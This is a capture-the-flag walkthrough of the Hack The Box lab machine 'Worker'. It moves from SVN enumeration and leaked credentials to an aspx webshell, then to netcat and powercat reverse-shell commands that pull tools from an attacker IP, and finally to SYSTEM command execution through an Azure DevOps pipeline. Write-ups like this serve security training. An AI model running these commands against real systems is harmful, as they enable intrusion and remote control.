Hack-The-Box-walkthrough[worker]

Posted on Edited on In Views: Word count in article: 2k Reading time ≈ 7 mins.

introduce

OS: Windows
Difficulty: Medium
Points: 30
Release: 15 Aug 2020
IP: 10.10.10.203

User Blood haqpl 00 days, 01 hours, 29 mins, 58 seconds.
Root Blood qtc 00 days, 03 hours, 10 mins, 42 seconds.

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
5
6
root@kali:~# nmap -sV -v -p- --min-rate=10000 10.10.10.203
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
3690/tcp open  svnserve Subversion
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

web

then browser to the following url

1
http://10.10.10.203/

shows us a default IIS webpage:

svnserve Subversion

looking around and found the following website:

  • SVN Commands Cheat Sheet

With this article we should be able to enumerate this service

1
2
3
root@kali:~# svn list svn://10.10.10.203
dimension.worker.htb/
moved.txt

time to download those files

1
2
3
4
5
6
7
8
9
10
root@kali:~/hackthebox/machine/worker# svn export svn://10.10.10.203/moved.txt
A    moved.txt
完成导出。
root@kali:~/hackthebox/machine/worker# ls
moved.txt
root@kali:~/hackthebox/machine/worker# cat moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb

// The Worker team :)

seen a new host name so also should add that to our /etc/hosts

1
http://devops.worker.htb

look at the dimensions page, find again a lot sub domains:

1
2
3
4
5
6
http://alpha.worker.htb/
http://cartoon.worker.htb/
http://lens.worker.htb/
http://solid-state.worker.htb/
http://spectral.worker.htb/
http://story.worker.htb/

also added them to my /etc/hosts file but couldn’t find there anything for now.
when we look at devops.worker.htb we getting asked for credentials:

looking back at the svn service there could also be revisions, lets see if that’s here the case:

1
2
3
4
5
6
7
8
9
10
11
root@kali:~# svn info svn://10.10.10.203
路径: .
URL: svn://10.10.10.203
Relative URL: ^/
版本库根: svn://10.10.10.203
版本库 UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
版本: 5
节点种类: 目录
最后修改的作者: nathen
最后修改的版本: 5
最后修改的时间: 2020-06-20 09:52:00 -0400 (六, 2020-06-20)

looks like there is we also see an potential username: nathen
let’s see if we can get some more info about these revisions

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root@kali:~# svn log svn://10.10.10.203
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (六, 2020-06-20) | 1 行

Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (六, 2020-06-20) | 1 行

Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 09:46:19 -0400 (六, 2020-06-20) | 1 行

-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 09:45:16 -0400 (六, 2020-06-20) | 1 行

Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 09:43:43 -0400 (六, 2020-06-20) | 1 行

First version
------------------------------------------------------------------------

then download these files:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
root@kali:~/hackthebox/machine/worker# svn export -r 2 svn://10.10.10.203 –force
A    –force
A    –force/deploy.ps1
A    –force/dimension.worker.htb
A    –force/dimension.worker.htb/LICENSE.txt
A    –force/dimension.worker.htb/README.txt
A    –force/dimension.worker.htb/assets
A    –force/dimension.worker.htb/assets/css
A    –force/dimension.worker.htb/assets/css/fontawesome-all.min.css
A    –force/dimension.worker.htb/assets/css/main.css
A    –force/dimension.worker.htb/assets/css/noscript.css
A    –force/dimension.worker.htb/assets/js
A    –force/dimension.worker.htb/assets/js/breakpoints.min.js
A    –force/dimension.worker.htb/assets/js/browser.min.js
A    –force/dimension.worker.htb/assets/js/jquery.min.js
A    –force/dimension.worker.htb/assets/js/main.js
A    –force/dimension.worker.htb/assets/js/util.js
A    –force/dimension.worker.htb/assets/sass
A    –force/dimension.worker.htb/assets/sass/base
A    –force/dimension.worker.htb/assets/sass/base/_page.scss
A    –force/dimension.worker.htb/assets/sass/base/_reset.scss
A    –force/dimension.worker.htb/assets/sass/base/_typography.scss
A    –force/dimension.worker.htb/assets/sass/components
A    –force/dimension.worker.htb/assets/sass/components/_actions.scss
A    –force/dimension.worker.htb/assets/sass/components/_box.scss
A    –force/dimension.worker.htb/assets/sass/components/_button.scss
A    –force/dimension.worker.htb/assets/sass/components/_form.scss
A    –force/dimension.worker.htb/assets/sass/components/_icon.scss
A    –force/dimension.worker.htb/assets/sass/components/_icons.scss
A    –force/dimension.worker.htb/assets/sass/components/_image.scss
A    –force/dimension.worker.htb/assets/sass/components/_list.scss
A    –force/dimension.worker.htb/assets/sass/components/_table.scss
A    –force/dimension.worker.htb/assets/sass/layout
A    –force/dimension.worker.htb/assets/sass/layout/_bg.scss
A    –force/dimension.worker.htb/assets/sass/layout/_footer.scss
A    –force/dimension.worker.htb/assets/sass/layout/_header.scss
A    –force/dimension.worker.htb/assets/sass/layout/_main.scss
A    –force/dimension.worker.htb/assets/sass/layout/_wrapper.scss
A    –force/dimension.worker.htb/assets/sass/libs
A    –force/dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A    –force/dimension.worker.htb/assets/sass/libs/_functions.scss
A    –force/dimension.worker.htb/assets/sass/libs/_mixins.scss
A    –force/dimension.worker.htb/assets/sass/libs/_vars.scss
A    –force/dimension.worker.htb/assets/sass/libs/_vendor.scss
A    –force/dimension.worker.htb/assets/sass/main.scss
A    –force/dimension.worker.htb/assets/sass/noscript.scss
A    –force/dimension.worker.htb/assets/webfonts
A    –force/dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A    –force/dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A    –force/dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A    –force/dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A    –force/dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A    –force/dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A    –force/dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A    –force/dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A    –force/dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A    –force/dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A    –force/dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A    –force/dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A    –force/dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A    –force/dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A    –force/dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A    –force/dimension.worker.htb/images
A    –force/dimension.worker.htb/images/bg.jpg
A    –force/dimension.worker.htb/images/overlay.png
A    –force/dimension.worker.htb/images/pic01.jpg
A    –force/dimension.worker.htb/images/pic02.jpg
A    –force/dimension.worker.htb/images/pic03.jpg
A    –force/dimension.worker.htb/index.html

then look at the deploy.ps1 we see some credentials:

1
2
3
4
5
6
7
root@kali:~/hackthebox/machine/worker/–force# cat deploy.ps1 
$user = "nathen" 
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")

  • username: nathen

  • password: wendel98

The only place where we could try credentials for now is

1
http://devops.worker.htb/

and we are logged in

Turns out we can edit here all the sites that we discovered earlier on the dimensions page.

since this a iis server we should be able now to create a reverse shell with asp or aspx.

gonna use aspx reverseshell cmdasp.aspx to spawn a reverse shell:

  • First we are gonna add a new branch:

go to Repos then click on SmartHotel360 and change to alpha for example. (there are subdomain DNS rabbithole)

  • Upload our aspx shell to our branch

  • create a new pull request

  • approve and complete pull request

then get a reverse shell

now Add spectral.worker.htb to your /etc/hosts and connect to

visit: http://spectral.worker.htb/cmdasp.aspx

now our webshell is avalueable

let’s make a reverse shell
on the webshell:

1
mkdir C:\temp

then

1
powershell -command Invoke-WebRequest -Uri http://10.10.14.5:8001/nc64.exe -Outfile C:\\temp\\nc64.exe

then:

1
C:\temp\nc64.exe 10.10.14.5 4445 -e powershell.exe

on your local machine

1
copy nc64.exe in worker directory

then

1
python -m SimpleHTTPServer 8001

and on another terminal:

1
nc -lvp 4445

now your connected as iis apppool\defaultapppool.

1
2
3
4
5
6
7
8
9
10
11
12
root@kali:~# nc -lvp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 10.10.10.203.
Ncat: Connection from 10.10.10.203:50819.
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv> whoami
whoami
iis apppool\defaultapppool

after running WinPEAs, we discover there is a w:\ drive
after some enumeration we find a password file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
PS W:\svnrepos\www\conf> type passwd
type passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday

look at c:\users\ we see that robisl is a valid user on the box.
Getting a shell with robisl and get user:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root@kali:~# evil-winrm -i 10.10.10.203 -u robisl -p wolves11

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\robisl\Documents> whoami
worker\robisl
*Evil-WinRM* PS C:\Users\robisl\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> ls


    Directory: C:\Users\robisl\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/18/2020   5:47 PM             34 user.txt


*Evil-WinRM* PS C:\Users\robisl\Desktop> cat user.txt
8a5171122e56ad7a77aabbc239f14892

get root

after some enum, we can’t privesc to root with robisl, (or maybe there a way but didn’t find anything usefull)

come back on the website devops.worker.htb and tryied to connect as robisl using wolves11 as password.

We are connected !

And the repo isn’t the same but nothing really usefull inside it. (no password stored, etc…)

  • But we can see we can create pipeline.

create a basic project.

go to pipeline, start one, then take Azure Repos git, select the basic default option (partunlimited)

then pick “Starter pipeline” in the different project list.

on the config script we can see we can execute command.
okay let’s see what’s we are:

  • replace echo Hello, world by whoami.

And remove the line:

1
pool: 'Default'

because the server don’t have pool agent so the build will fail and we won’t have code execution.

now it’s all good press Save and run and let’s wait the build finish.

when looking at the log (script log) , we can see we run as

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
##[section]Starting: Run a one-line script
==============================================================================
Task         : Command line
Description  : Run a command line script using Bash on Linux and macOS and cmd.exe on Windows
Version      : 2.151.1
Author       : Microsoft Corporation
Help         : https://docs.microsoft.com/azure/devops/pipelines/tasks/utility/command-line
==============================================================================
Generating script.
Script contents:
whoami
========================== Starting Command Output ===========================
##[command]"C:\Windows\system32\cmd.exe" /D /E:ON /V:OFF /S /C "CALL "w:\agents\agent11\_work\_temp\b1a4ec90-9e94-4e5f-9074-a565cefb9956.cmd""
nt authority\system
##[section]Finishing: Run a one-line script

We run the code execution as root!!!

just create another pipeline and change script command to

1
type C:\Users\Administrator\Desktop\root.txt

and we got the root flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
##[section]Starting: Run a one-line script
==============================================================================
Task         : Command line
Description  : Run a command line script using Bash on Linux and macOS and cmd.exe on Windows
Version      : 2.151.1
Author       : Microsoft Corporation
Help         : https://docs.microsoft.com/azure/devops/pipelines/tasks/utility/command-line
==============================================================================
Generating script.
Script contents:
type C:\Users\Administrator\Desktop\root.txt
========================== Starting Command Output ===========================
##[command]"C:\Windows\system32\cmd.exe" /D /E:ON /V:OFF /S /C "CALL "w:\agents\agent11\_work\_temp\389e4fa6-cf26-41d6-9dc5-7d09979f7b00.cmd""
43ebb4cb30276f0c2e77511c1d5b69d4
##[section]Finishing: Run a one-line script

this is a ctf,we can stop at here now.

or add a reverse shell command if you want to connect to your local machine.

1
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.5/powercat.ps1');powercat -c 10.10.14.5 -p 3344 -e cmd"
  • powercat github download

on attack machine

1
python -m SimpleHTTPServer 80

then run it, we will get a reverse shell

Summary of knowledge

  • enumerate svn service
  • credentials disclosure
  • azure devops getshell
  • powershell download files
  • WinPEAs usage
  • azure devops create pipeline then get command excecution

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…